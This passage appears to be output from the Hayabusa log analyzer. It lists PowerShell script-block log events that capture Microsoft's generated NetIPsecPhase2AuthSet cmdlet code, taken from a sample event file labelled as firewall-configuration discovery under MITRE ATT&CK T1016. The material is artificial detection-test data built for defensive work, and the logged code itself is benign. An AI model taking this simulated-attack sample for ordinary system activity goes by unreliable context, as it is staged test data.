IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 
